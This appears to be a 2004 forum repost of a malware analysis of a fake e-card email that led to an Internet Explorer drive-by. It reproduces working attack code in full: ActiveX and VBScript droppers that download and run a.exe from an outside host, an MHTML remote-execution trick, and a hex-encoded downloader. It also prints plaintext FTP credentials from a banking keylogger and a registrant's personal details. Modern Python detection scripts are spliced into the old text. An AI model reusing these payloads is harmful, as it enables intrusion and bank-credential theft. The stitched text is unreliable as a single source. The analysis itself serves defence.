Free Republic | News/Activism

E-card Hijack Spam [See LM's Note At Top Of Thread]
http://www.tjhsst.edu/~agupta/ecard-hijack/ | 2/15/04 | Aman Gupta

Posted on 02/18/2004 8:33:00 PM PST by Slings and Arrows

Edited on 02/19/2004 4:25:12 AM PST by Lead Moderator.

[LM's Note: We got a report that when a user tried to load this thread, his anti-virus flagged the html file as containing a "virus" (actually, a web exploit). In reality, this thread is about the exact web exploit that that anti-virus scanner "caught", but the thread does not contain the actual exploit. The virus scanner apparently looks for certain text strings to identify the exploit's fingerprint, and while those are in this thread, the stuff that makes the exploit work is not. Thanks, LM]

E-card Hijack Spam

Introduction

I got an email on February 15th, 2004 telling me I had received an e-card from someone at 123greetings.com. The email looked a little bit suspicious, since the sender of the e-card (kissmytearsx@comcast.net) was someone I didn't recognize, and the URL to view the card showed the root domain of 123greetings.com. However, being the lonely geek I am, I clicked on the link hoping that I had a secret admirer who had emailed me a card for Valentine's Day...

The page opened in my browser, but nothing happened. Lucky for me, I wasn't using Internet Explorer so I was saved. A closer look at the email and URL revealed the following:

It has been pointed out to me that the email says that you sent a card, not received one. I should have noticed this and realized I hadn't sent any cards to anyone.

The E-mail

There are several things to notice about the following email. Starting at the beginning, the email was sent from a DSL account in Poland (rk160.neoplus.adsl.tpnet.pl in the last Received header); it definitely did not come from the 123greetings.com servers. The From, Reply-To, Sender and Return-Path headers are obviously fake.

A comment in the HTML content of the email shows that it was saved from http://d40921.u24.whp-server.com/card.htm, where a copy of what is presumably the original email still exists. The title tag is set to "Untitled Document", and a META tag indicates that the HTML was generated using a Microsoft product (MSHTML 6.00).

The URL view-source:http://210.192.42.34/img/ [warning, don't click unless you know what you're doing] appears throughout the rest of the email. All the links have been changed to point to this URL, and a 0x0 iframe at the end of the email also opens it.

From ecard@123greetings.com Sun Feb 15 11:13:52 2004
Return-Path: <ecard@123greetings.com>
Delivered-To: MYEMAIL
Received: from localhost (localhost [127.0.0.1])
    by mail.tjhsst.edu (Postfix) with ESMTP id 99462A2C1A
    for <MYEMAIL>; Sun, 15 Feb 2004 11:13:52 -0500 (EST)
Received: from mail.tjhsst.edu ([127.0.0.1])
    by localhost (macaroni [127.0.0.1]) (amavisd-new, port 20025)
    with ESMTP id 01846-06 for <MYEMAIL>; Sun, 15 Feb 2004 11:13:52 -0500 (EST)
Received: from mail.zoneedit.com (mail.zoneedit.com [209.152.174.160])
    by mail.tjhsst.edu (Postfix) with ESMTP id AF227A2C19
    for <MYEMAIL>; Sun, 15 Feb 2004 11:13:51 -0500 (EST)
Received: from compuserve.com (rk160.neoplus.adsl.tpnet.pl [80.50.83.160])
    by mail.zoneedit.com (Postfix) with SMTP id C84213EBB8
    for <MYEMAIL>; Sun, 15 Feb 2004 11:13:48 -0500 (EST)
Date: Sun, 15 Feb 2004 16:16:50 +0000
From: Ecard <ecard@123greetings.com>
Subject: You have received E-card at 123Greetings.com
To: ME <MYEMAIL>
Message-ID: <2BK7DCI33AK80CAE@123greetings.com>
Reply-To: Ecard <ecard@123greetings.com>
Sender: Ecard <ecard@123greetings.com>
MIME-Version: 1.0
Content-Type: text/html; charset=Windows-1251
X-Virus-Scanned: by amavisd-new-20030616-p5 (Debian) at macaroni
X-Spam-Status: No, hits=4.3 tagged_above=2.0 required=6.3
    tests=HTML_30_40, HTML_COMMENT_SAVED_URL, HTML_MESSAGE, HTML_RELAYING_FRAME,
    HTML_TITLE_UNTITLED, MIME_HTML_ONLY, NORMAL_HTTP_TO_IP, RCVD_FAKE_HELO_DOTCOM
X-Spam-Level: ****
Content-Transfer-Encoding: 8bit

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0041)http://d40921.u24.whp-server.com/card.htm -->
<HTML><HEAD><TITLE>Untitled Document</TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2737.800" name=GENERATOR></HEAD>
<BODY bgColor=#ffffff><PRE>Dear Admirer,

Your e-card has been sent to My... at kissmytearsx@comcast.net

123Greetings.com is all about touching lives, bridging distances, healing rifts and building bonds. We have a gallery of e-cards for almost every occasion of

life. Express yourself to your friends and family by sending Free e-cards from our site with your choice of colors, words and music.

Your e-card will be available with us for the next 30 days. If you wish to keep the e-card longer, you may save it on your computer or take a print.

To view a copy of the e-card you have sent, choose from any of the following options:

-------- OPTION 1 --------

Click on the following Internet address or copy & paste it into your browser's address box.

<A href="http://210.192.42.34/img/">http://www.123greetings.com/</A>

-------- OPTION 2 --------

Copy & paste the e-card number in the "View Your Card" box at <A href="http://210.192.42.34/img/">http://ww.123greetings.com/</A>

Your e-card number is 7CU20121085738151

If you need help in viewing your e-card or any other assistance, please visit our Help / FAQ section located at <A href="http://210.192.42.34/img/">http://ww.123greetings.com/help/</A>

If you need further help, feel free to write to us at <A href="mailto:%20support@123greetings.com">mailto:%20support@123greetings.com</A>

Best wishes,

Postmaster, 123Greetings.com

*If you would like to send someone an e-card, you can do so at <A href="http://210.192.42.34/img/">http://ww.123greetings.com/</A>
<IFRAME SRC="http://210.192.42.34/img/" height="0" width="0">gf</iframe>
</PRE></BODY></HTML>
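The two tells in this message, a Received chain that ends at a host unrelated to the claimed sender and links whose visible text names one host while the href points at another, can be checked mechanically. The following Python script is an added example, not part of Gupta's write-up: it parses a constructed message modelled on the quoted headers (recipient replaced by a placeholder), walks the Received chain back to the injecting host, compares that host with the domain in From, and scans the HTML body for mismatched anchors and zero-size iframes. The sample message, the Received regex and the function names are this example's own assumptions.

```python
"""Provenance and link checks for a spoofed HTML e-mail (added example, not
from the original write-up). Walks the Received chain back to the injecting
host, compares it with the domain claimed in From, and flags anchors whose
visible text names a different host than their href plus zero-size iframes.
The message below is constructed, modelled on the quoted headers."""
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

SAMPLE_EMAIL = """\
Return-Path: <ecard@123greetings.com>
Received: from mail.zoneedit.com (mail.zoneedit.com [209.152.174.160])
\tby mail.tjhsst.edu (Postfix) with ESMTP id AF227A2C19
\tfor <MYEMAIL>; Sun, 15 Feb 2004 11:13:51 -0500 (EST)
Received: from compuserve.com (rk160.neoplus.adsl.tpnet.pl [80.50.83.160])
\tby mail.zoneedit.com (Postfix) with SMTP id C84213EBB8
\tfor <MYEMAIL>; Sun, 15 Feb 2004 11:13:48 -0500 (EST)
From: Ecard <ecard@123greetings.com>
Subject: You have received E-card at 123Greetings.com
To: ME <MYEMAIL>
Content-Type: text/html; charset=Windows-1251

<HTML><BODY><PRE>
<A href="http://210.192.42.34/img/">http://www.123greetings.com/</A>
<A href="mailto:support@123greetings.com">mailto:support@123greetings.com</A>
<IFRAME SRC="http://210.192.42.34/img/" height="0" width="0">gf</iframe>
</PRE></BODY></HTML>
"""

# "from HELO (rDNS [ip]) by RELAY": the shape Postfix writes in the quoted headers.
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?P<rdns>[^\s\[]+)\s+\[(?P<ip>[^\]]+)\]\)\s+by\s+(?P<by>\S+)")


def received_hops(msg):
    """Parsed Received hops, outermost (nearest to us) first; the last injected the mail."""
    hops = [RECEIVED_RE.search(" ".join(v.split())) for v in msg.get_all("Received", [])]
    return [m.groupdict() for m in hops if m]


def provenance_findings(msg):
    """Plain-language reasons to distrust the claimed sender."""
    hops = received_hops(msg)
    if not hops:
        return ["no parseable Received header"]
    origin = hops[-1]
    claimed = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    out = []
    if origin["helo"].lower() != origin["rdns"].lower():
        out.append(f"HELO '{origin['helo']}' disagrees with reverse DNS '{origin['rdns']}'")
    if claimed and not origin["rdns"].lower().endswith(claimed):
        out.append(f"From claims '{claimed}' but the mail entered via "
                   f"'{origin['rdns']}' [{origin['ip']}]")
    return out


class LinkCollector(HTMLParser):
    """Collects (href, visible text) for anchors and the attributes of iframes."""

    def __init__(self):
        super().__init__()
        self.anchors, self.iframes, self._href, self._text = [], [], None, []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a":
            self._href, self._text = attrs.get("href", ""), []
        elif tag == "iframe":
            self.iframes.append(attrs)

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def link_findings(html):
    """(shown_host, real_host) for mismatched anchors, and src of zero-size iframes."""
    p = LinkCollector()
    p.feed(html)
    host = lambda u: urlparse(u.strip()).hostname or ""
    spoofed = [(host(t), host(h)) for h, t in p.anchors
               if host(t) and host(h) and host(t) != host(h)]
    hidden = [a.get("src", "") for a in p.iframes
              if a.get("width") == "0" and a.get("height") == "0"]
    return spoofed, hidden


def analyse(raw):
    """Run both checks over a raw RFC 822 message string."""
    msg = message_from_string(raw)
    body = (msg.get_payload(decode=True) or b"").decode(
        msg.get_content_charset() or "ascii", "replace")
    spoofed, hidden = link_findings(body)
    return {"hops": received_hops(msg), "provenance": provenance_findings(msg),
            "spoofed_links": spoofed, "hidden_iframes": hidden}


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_EMAIL).items():
        print(f"{key}: {value}")
```

The Received headers are read bottom-up because each relay prepends its own line, so the last one is the only hop that says where the message really came from; everything above it is your own infrastructure. The mailto: link is skipped on purpose (no host to compare), which is also why the script reports hosts rather than full URLs.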

The Offending URL

The URL, whose HTML source is reproduced below, does some really nasty stuff. Using iframes, object tags and JavaScript, it opens several other files from the server, which are explained later on.

In addition to opening other URLs, the page does its own share of nasty things. It includes a hidden textarea containing ActiveX code that downloads a certain a.exe and overwrites Windows Media Player's wmplayer.exe with it. Once the file has been replaced, IE is redirected to an mms:// URL, which causes wmplayer.exe to be invoked. The code in this textarea is processed by some JavaScript after a 5 second timeout, and is run in Internet Explorer's 'Media Sidebar'. Before this 5 second timeout, however, a fake URL, error.jsp, is opened in the media sidebar to throw off the user.

<iframe src="spy.htm" height="0" width="0">f</iframe>
<iframe src="start.html" height="0" width="0">f</iframe>
<iframe src="ro.htm" height="0" width="0">f</iframe>

<object data="1.php"></object>

<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://adversting.co.uk/a.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>

<script language="javascript">
function preparecode(code) {
  result = '';
  lines = code.split(/\r\n/);
  for (i=0;i<lines.length;i++) {
    line = lines[i];
    line = line.replace(/^\s+/,"");
    line = line.replace(/\s+$/,"");
    line = line.replace(/'/g,"\\'");
    line = line.replace(/[\\]/g,"\\\\");
    line = line.replace(/[/]/g,"%2f");
    if (line != '') { result += line +'\\r\\n'; }
  }
  return result;
}

function doit() {
  mycode = preparecode(document.all.code.value);
  myURL = "file:javascript:eval('" + mycode + "')";
  window.open(myURL,"_media")
}

window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>

spy.htm - I wonder what this does?

Despite its malicious-sounding name, all this file contains is the tracking code provided by a Russian company, spylog.com. I couldn't figure out how to view the stats that are being compiled by spylog, but the author no doubt has access to these stats and can use them to figure out how many computers he has hijacked.

<!-- SpyLOG f:0211 -->
<script language="javascript"><!--
Mu="u5327.08.spylog.com";Md=document;Mnv=navigator;Mp=0;
Md.cookie="b=b";Mc=0;if(Md.cookie)Mc=1;Mrn=Math.random();
Mn=(Mnv.appName.substring(0,2)=="Mi")?0:1;Mt=(new Date()).getTimezoneOffset();
Mz="p="+Mp+"&rn="+Mrn+"&c="+Mc+"&t="+Mt;
if(self!=top){Mfr=1;}else{Mfr=0;}Msl="1.0";
//--></script><script language="javascript1.1"><!--
Mpl="";Msl="1.1";Mj = (Mnv.javaEnabled()?"Y":"N");Mz+='&j='+Mj;
//--></script><script language="javascript1.2"><!--
Msl="1.2";Ms=screen;Mpx=(Mn==0)?Ms.colorDepth:Ms.pixelDepth;
Mz+="&wh="+Ms.width+'x'+Ms.height+"&px="+Mpx;
//--></script><script language="javascript1.3"><!--
Msl="1.3";//--></script><script language="javascript"><!--
My="";My+="<a href='http://"+Mu+"/cnt?cid=532708&f=3&p="+Mp+"&rn="+Mrn+"'
target='_blank'>";
My+="<img src='http://"+Mu+"/cnt?cid=532708&"+Mz+"&sl="+Msl+
"&r="+escape(Md.referrer)+"&fr="+Mfr+"&pg="+escape(window.location.href);
My+="' border=0 width=88 height=31 alt='SpyLOG'>";
My+="</a>";Md.write(My);//--></script><noscript>
<a href="http://u5327.08.spylog.com/cnt?cid=532708&f=3&p=0" target="_blank">
<img src="http://u5327.08.spylog.com/cnt?cid=532708&p=0" alt='SpyLOG'
border='0' width=88 height=31 >
</a></noscript>
<!-- SpyLOG -->

start.html - The file that ran away

Presumably, this file actually existed at one point and did something (maybe changed the browser's start page?), but it no longer exists.

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /img/start.html was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3.12 Server at panda.coventive.com Port 80</ADDRESS>
</BODY></HTML>

ro.html - Remote execution

The author tries yet another IE exploit to run a.exe remotely.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script>
WaitForDocumentCached_TIME=100;

function LaunchRemoteExe_Step2() {
  //One more fresh action is present for more stable performance
  for(i=1;i<=2;i++) w.document.execCommand("Refresh");
}

function LaunchRemoteExe(ExeUrl) {
  w=window.open("about:blank","_blank","width=300 height=400 resizable=yes location=yes");
  w.document.write("<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111113' CODEBASE='mhtml:file://C:\NO_SUCH_MHT.MHT!" + ExeUrl + "'>");
  setTimeout("LaunchRemoteExe_Step2()",WaitForDocumentCached_TIME);
}

LaunchRemoteExe("http://adversting.co.uk/a.exe")
</script>
</head>
<body>
<font size="6"><font size="2"><big><big><big> <big>HijackClickV2-MyPage</big></big> </big></big><b><i><br> <br>
</body>
</html>

1.php - Last Attempt

1.php tries one last method to run a.exe. The file contains VBScript code, but probably uses PHP so that it can send an 'application/hta' content-type header. The encoded VBScript has been removed (view it at view-source:http://210.192.42.34/img/1.php) and replaced with the decoded version of the code.

The VBScript code contains strings which represent, in hex, the binary contents of a certain executable, which is saved as x.exe. Once saved, this executable is launched with the URL to a.exe as an argument.

<html>

<script language=vbs> szURL = "http://adversting.co.uk/a.exe" </script>

<script language="VBScript.Encode">

<%
szZeroLine =
 "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
szBinary = ""
szBinary = szBinary &
 "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000"
szBinary = szBinary &
 "000000000000000000000000B80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F"
szBinary = szBinary &
 "742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005D87017219E66F2119E66F2119E66F21"
szBinary = szBinary &
 "97F97C2112E66F21E5C67D2118E66F215269636819E66F2100000000000000000000000000000000504500004C010300"
szBinary = szBinary &
 "AB93493F0000000000000000E0000F010B01050C00020000000400000000000000100000001000000020000000004000"
szBinary = szBinary &
 "001000000002000004000000000000000400000000000000004000000004000000000000020000000000100000100000"
szBinary = szBinary &
 "000010000010000000000000100000000000000000000000182000002800000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine
szBinary = szBinary &
 "2E7465787400000064000000001000000002000000040000000000000000000000000000200000602E72646174610000"
szBinary = szBinary &
 "BE000000002000000002000000060000000000000000000000000000400000402E646174610000002700000000300000"
szBinary = szBinary &
 "0002000000080000000000000000000000000000400000C0000000000000000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
 szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary &
 "00000000000000000000000000000000E8470000006683C00A8D08516800304000E842000000680B30400050E8310000"
szBinary = szBinary &
 "00596A006A008D1D1E30400053516A00FFD06A01681E304000E8200000006A00E801000000CCFF2510204000FF250020"
szBinary = szBinary &
 "4000FF2504204000FF2508204000FF250C20400000000000000000000000000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
 szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary &
 "66200000782000008A2000009A2000005820000000000000402000000000000000000000A42000000020000000000000"
szBinary = szBinary &
 "0000000000000000000000000000000066200000782000008A2000009A20000058200000000000008000457869745072"
szBinary = szBinary &
 "6F6365737300C800476574436F6D6D616E644C696E6541001F0147657450726F63416464726573730000A4014C6F6164"
szBinary = szBinary &
 "4C696272617279410000940257696E45786563006B65726E656C33322E646C6C00007573657233322E646C6C00000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
 szZeroLine & szZeroLine
szBinary = szBinary &
 "000000000000000000000000000000000000000000000000000000000000000075726C6D6F6E2E646C6C0055524C446F"
szBinary = szBinary &
 "776E6C6F6164546F46696C654100633A5C792E6578650000000000000000000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
 szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary & "00000000000000000000000000000000"
szApplication = "c:\x.exe"
Set hFSO = CreateObject("Scripting.FileSystemObject")
Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)
intLength = len(szBinary)
intPosition = 1
while intPosition < intLength
char = Int("&H" & Mid(szBinary, intPosition, 2))
hFile.Write(Chr(char))
intPosition = intPosition+2
wend
hFile.Close
Set hShell=CreateObject("WScript.Shell")
hShell.run(szApplication+" "+szURL)
%>
</script>
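The landing page, ro.htm and 1.php each leave a distinctive textual fingerprint: scriptable ActiveX objects that fetch and write files, a hidden textarea whose contents are fed to eval through a file: URL, zero-size iframes, an MHTML CODEBASE on an OBJECT tag, and encoded VBScript that reaches for the file-system and shell objects. The Python scan below is an added example, not code from the original page: it matches those fingerprints over constructed HTML samples and turns the hits into a coarse risk level. The rule names, the weights and the three sample pages are this example's own choices, made up here to exercise the rules without reproducing the working payload.

```python
"""Indicator scan for drive-by pages of the kind described above (added
example, not from the original page). Each rule names one technique the
write-up documents and matches its textual fingerprint. Rule names,
weights and the sample pages are this example's own assumptions."""
import re

# (rule name, weight, pattern). Weights are an assumption: techniques that
# write or execute a file score higher than mere concealment.
RULES = [
    ("activex-http-download", 1, r'ActiveXObject\s*\(\s*["\']Microsoft\.XMLHTTP["\']'),
    ("activex-file-write", 3, r'ActiveXObject\s*\(\s*["\']ADODB\.Stream["\']'),
    ("file-javascript-eval", 3, r'file:javascript:'),
    ("hidden-textarea", 1, r'<textarea[^>]*display\s*:\s*none'),
    ("zero-size-iframe", 1, r'<iframe[^>]*\b(?:width|height)\s*=\s*["\']?0\b'),
    ("mhtml-codebase", 3, r'CODEBASE\s*=\s*["\']?mhtml:'),
    ("encoded-vbscript", 3, r'language\s*=\s*["\']?VBScript\.Encode'),
    ("filesystem-object", 3, r'Scripting\.FileSystemObject'),
    ("shell-run", 3, r'WScript\.Shell'),
    ("exe-download-url", 1, r'https?://[^\s"\'<>]+\.exe\b'),
]
COMPILED = [(name, weight, re.compile(pat, re.I)) for name, weight, pat in RULES]


def scan(html):
    """Map rule name -> matched snippets, for the rules that fired."""
    hits = {}
    for name, _, pat in COMPILED:
        found = [m.group(0)[:60] for m in pat.finditer(html)]
        if found:
            hits[name] = found
    return hits


def score(hits):
    """Sum of the weights of the rules that fired (each counted once)."""
    weights = {name: w for name, w, _ in RULES}
    return sum(weights[name] for name in hits)


def risk_level(hits):
    """Coarse bucket: one concealment trick alone is 'low', a dropper is 'high'."""
    s = score(hits)
    if s >= 4:
        return "high"
    if s >= 2:
        return "medium"
    return "low" if s >= 1 else "none"


# Constructed samples (not the pages from the write-up). The first mirrors the
# loader's shape without the working payload; the others are controls.
SAMPLE_LOADER = """
<iframe src="tracker.htm" height="0" width="0">f</iframe>
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
var s = new ActiveXObject("ADODB.Stream");
</textarea>
<script>
window.open("file:javascript:eval('...')", "_media");
</script>
<a href="http://malware.example/a.exe">card</a>
"""
SAMPLE_BENIGN = """
<textarea id="comment"></textarea>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
<script>document.getElementById("comment").focus();</script>
"""
SAMPLE_TRACKER_ONLY = '<iframe src="stats.htm" height="0" width="0"></iframe>'

if __name__ == "__main__":
    for label, page in (("loader", SAMPLE_LOADER), ("benign", SAMPLE_BENIGN),
                        ("tracker-only", SAMPLE_TRACKER_ONLY)):
        hits = scan(page)
        print(f"{label}: {risk_level(hits)} ({score(hits)}) {sorted(hits)}")
```

The tracker-only sample is why the weights matter: a zero-size iframe on its own is what spy.htm's counter looks like in a page, so it should raise an eyebrow but not a page-wide alarm, whereas ADODB.Stream or a file:javascript: URL inside a hidden element has no legitimate reason to appear in a greeting card.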

x.exe - The Accomplice

I don't have a Windows machine, and don't particularly want to run this and the other executable on one. If someone wants to investigate, feel free, and be sure to email me anything you find so that I can update this page.

Feb 16th, 12PM: According to Robert Myers, x.exe isn't a valid Windows executable, and doesn't run properly on either XP or 98. Looking at the raw binary, the intent is to simply download the URL given on the command line and execute it. It should download a.exe, call it c:\y.exe and run it.

Feb 16th, 3PM: Slashdot reader James Sneeringer emailed me the following update:

As you know, 1.php decodes into x.exe. It's quite small, only 2512 bytes. When run, it evidently attempts to download whatever URL is passed to it (using URLDownloadToFileA()) and saves it to c:\y.exe, then tries to run it (using WinExec()). So x.exe downloads a.exe as y.exe and runs it.

I obtained a.exe from the URL in 1.php, http://adversting.co.uk/a.exe. The a.exe file appears to be a keylogger, as the string "key.log" is contained in it. It contains calls to RegCreateKeyExA(), MessageBoxA(), and InternetOpenA(), so it probably does the usual trojan/worm thing... ensures it starts up on reboot, prints misleading error messages, phones home, etc.

I have not run any of these programs. I have only analyzed them on a Linux system using the strings command. I did copy a.exe to a Windows system running Norton AntiVirus, but it didn't flag it as any known Trojan or SpyWare. I obtained x.exe by converting the VBScript code to perl. I hope this helps.

a.exe - Final Destination

Feb 16th, 3:30PM: I've gotten several emails providing information about a.exe (md5sum e8262377158e2b0b3932292f49fd23a6).

Robert Myers reports that the exe has references to spy.dll and keylg.dll

John reports:

I analyzed the a.exe and found disturbing info:

it is after banks, as described in an unpacked version (the file is compacted). Bank list is as follows:

hangseng.HSBC.bank.PIN.ufjbank.smbc.co.jp.btm.co.jp. rhbbank.com.ambg.com.my.affinbank.com.my.publicbank.com.my. Shinsei.jbic.go.jp.boj.or.jp.sanwabank.co.jp.stormpay.com. ccbusa.com.goldmoney.e-gold.e-bullion.tradeodds.com. datek.betonmarket.com.evocash.bancaja.es.santandercentralhispano.es. bancopopular.es.cajamadrid.es.caixapenedes.es.caixamanresa.es. caixatarragona.es.cme.com.fxall.com. bank.banc.e-gold.evocash.e-bullion.hangseng.HSBC.PIN.smbc.co.jp. btm.co.jp.rhbbank.com.ambg.com.my.Shinsei.jbic.go.jp.jbic.go.jp. stormpay.com.ccbusa.com.goldmoney.tradeodds.com.datek.betonmarket.com. santandercentralhispano.es.cajamadrid.es.caixapenedes.es.caixamanresa.es. caixatarragona.es.bot.or.th.banque.bnm.gov.my.dnb.nl. bundesbank.de.TAN.ecb.int.mas.gov.sg.snb.ch.federalreserve.gov. abnamro.com.aib.ie.bnl.it.ingbarings.com.bankofamerica.com. bmonesbittburns.com.barcap.com.bearstearns.com.bnpparibas.com. chase.com.consors.de.ca-indosuez.com.creditlyonnais.com.csfb.com. firstunion.com.intesabci.it.jp morgan.com.leuveninc.com.ldc.co.uk. nabmarkets.com.nomura.com.rbsmarkets.com.sakura.co.jp. salomonsmithbarney.com.scotiacapital.com.sg-ib.com.standardchartered.com. smbc.co.jp.csweb.co.jp.td.com.travelex.com.ubs.com.wachovia.com. wellsfargo.com.westlbmarkets.net.saxobank.com.e-trade.admin.clearstation.com. daytraders.com.decisionpoint.com.earningswhispers.com.investools.com. nni.nikkei.co.jp.stockwinners.com.tradetrek.com.brownco-apply.com. schwabtrader.com.processrequest.com.anz.com.olb.westpac.commbank.com.au. ambg.com.my.bpm.com.my.bcb.com.my.hhb.com.my.borneo-online.com.my.rba.gov.au. panamaoffshore.com.eib.org.offshore.53.com.amex.com.money.net.st.rim.or.jp. meigin.com.it-okinawa.or.jp.chb.com.tw.www2.japanexim.go.jp.www.gs.com. juroku.co.jp.iijnet.or.jp.mitsubishi-trust.co.jp.msdw.co.jp.ncb.co.jp. hirogin.co.jp.clariden.com.dahsing.com.hk.iba.com.hk.worldsec.com. unicredito.it.rzb.at.mevas.com.ibnk.bcif.fr.rzb.at.smc.fr. 
www.socgen.com.www.westlb.com.www.boh.com.cib.ibanking-services.com. internetonline2.com.agrolink.moa.my.maybank2u.com.my.bankrakyat.com. my.nwabank.co.jp.ufjbank.parex.ogress.banco

The files it installs are:

C:\WINDOWS\SYSTEM\~key.log keylogging file ?
C:\WINDOWS\SYSTEM\~post.log other post file ?

Files it refers to: spy.dll klgd.dll

Interesting info about the author:
g:\!Work\__Current\$0000_FHooker_Chazer\Release\TrojWithHooker.pdb
g:\!Work\__Current\$0000_FHooker_Chazer\Dll\Release\DLL.pdb
ProgLib.dll._Prog_HookAllApps@12
MoneyFtp (???)

The information (logfiles) is sent out to an FTP site that is UP as of yet. I informed the abuse department of the hosters of the FTP site and am giving them a chance to shut it down. It is not yet wise to include this particular information on your site, as there could be consequences for the people whose log is already collected.

And Jack emailed me:

I downloaded a.exe out of curiosity, and have been analysing it. The file contains a number of very interesting strings, which make it quite obvious that this program attempts to hijack the user's personal login information as they log in to various popular Internet banking services.

The strings are (trivially) encrypted. However, once every character in a.exe is XOR'ed with 255, they appear. I have listed them below.

Of particular interest are the five at the top. Seems as if the details are uploaded to one of two FTP sites, and the exploit may affect people using Opera as well as IE.

64.191.23.212 21 ircd thepassw0rd https http Internet Explorer Opera 69.93.102.218 21 logi bbzaza123 hangseng HSBC bank ufjbank smbc.co.jp btm.co.jp rhbbank.com ambg.com.my affinbank.com.my publicbank.com.my Shinsei jbic.go.jp boj.or.jp sanwabank.co.jp stormpay.com ccbusa.com goldmoney

... continues in similar vein, with 152 more strings.

I have found this very scary. I cannot believe how openly malicious this program actually is.
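Jack's recovery method, XORing every byte of the file with 255 and then looking for printable runs, as an added Python example that is not from the original page. It goes one step beyond the single case described: rank_xor_keys tries all 256 single-byte keys and ranks them by how much host-name-like text each one yields, which is a heuristic rather than a proof, and key 0 covers a file that was never obfuscated. The sample blob is constructed here (a few config-like strings XORed with 0xFF), not bytes taken from a.exe.

```python
"""Recovering single-byte-XOR obfuscated strings from a binary (added
example, not from the original page). The sample blob is constructed."""
import string

# Printable ASCII minus layout control characters, roughly as `strings` sees it.
PRINTABLE = frozenset(string.printable.encode("ascii")) - frozenset(b"\t\n\r\x0b\x0c")
# Bytes typical of config strings and host names; used only to rank candidate keys.
TEXTY = frozenset(b"abcdefghijklmnopqrstuvwxyz0123456789 .:/-_@")


def xor_bytes(data, key):
    """XOR every byte with a single-byte key (XOR is its own inverse)."""
    return bytes(b ^ key for b in data)


def extract_strings(data, min_len=4):
    """Runs of printable ASCII at least min_len long, like `strings`."""
    out, run = [], bytearray()
    for b in data:
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode("ascii"))
    return out


def recover_strings(data, key=0xFF, min_len=4):
    """Jack's case: undo the XOR-255 obfuscation and list the strings."""
    return extract_strings(xor_bytes(data, key), min_len)


def text_score(data, min_len=4):
    """Heuristic: how many bytes inside printable runs look like config text."""
    return sum(1 for s in extract_strings(data, min_len)
               for b in s.encode("ascii") if b in TEXTY)


def rank_xor_keys(data, top=3):
    """Try every single-byte key and return the best (key, score) pairs."""
    scored = sorted(((text_score(xor_bytes(data, k)), k) for k in range(256)),
                    reverse=True)
    return [(k, s) for s, k in scored[:top]]


# Constructed sample: a few config-like strings, NUL-separated, wrapped in a
# little non-text padding, then obfuscated with XOR 0xFF.
_PLAIN = (b"\x4d\x5a\x90\x00"
          + b"\x00".join([b"192.0.2.10", b"21", b"Internet Explorer",
                          b"Opera", b"examplebank.test"])
          + b"\x00\x10\x20")
SAMPLE_BLOB = xor_bytes(_PLAIN, 0xFF)

if __name__ == "__main__":
    print("raw strings:      ", extract_strings(SAMPLE_BLOB))
    print("xor 0xff strings: ", recover_strings(SAMPLE_BLOB))
    print("best keys:        ", rank_xor_keys(SAMPLE_BLOB))
```

Plain `strings` finds nothing in the blob because every printable byte has been pushed above 0x7F; applying the key brings the host names and browser names straight back, which is the behaviour Jack describes. The ranking is worth a sanity check on real samples: keys that differ from the true one in a single low bit also produce letter-like runs, so the scorer rewards spaces, dots and lowercase letters rather than mere printability.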

adversting.co.uk - Look, it's misspelt

Feb 16th, 12PM: Mike Richards did some research on the domain that a.exe is being pulled from. Here's what he found:

The site is registered in the UK and points to another mass marketing company called trafficdiscount.com. They are located in the US and their registration details are:

Registrant Name: Daniel Belcher
Registrant Organization: Slick Website Development
Registrant Address: 1111 Kathryn Rd.
Registrant City: Mt. Juliet
Registrant State/Province: TN
Registrant Postal Code: 37122
Registrant Country: US
Registrant Phone Number: +61.54434190
Registrant Fax Number: +.
Registrant Email: daniel@s-w-d.net

They are currently providing services through Wiltel.

Conclusion

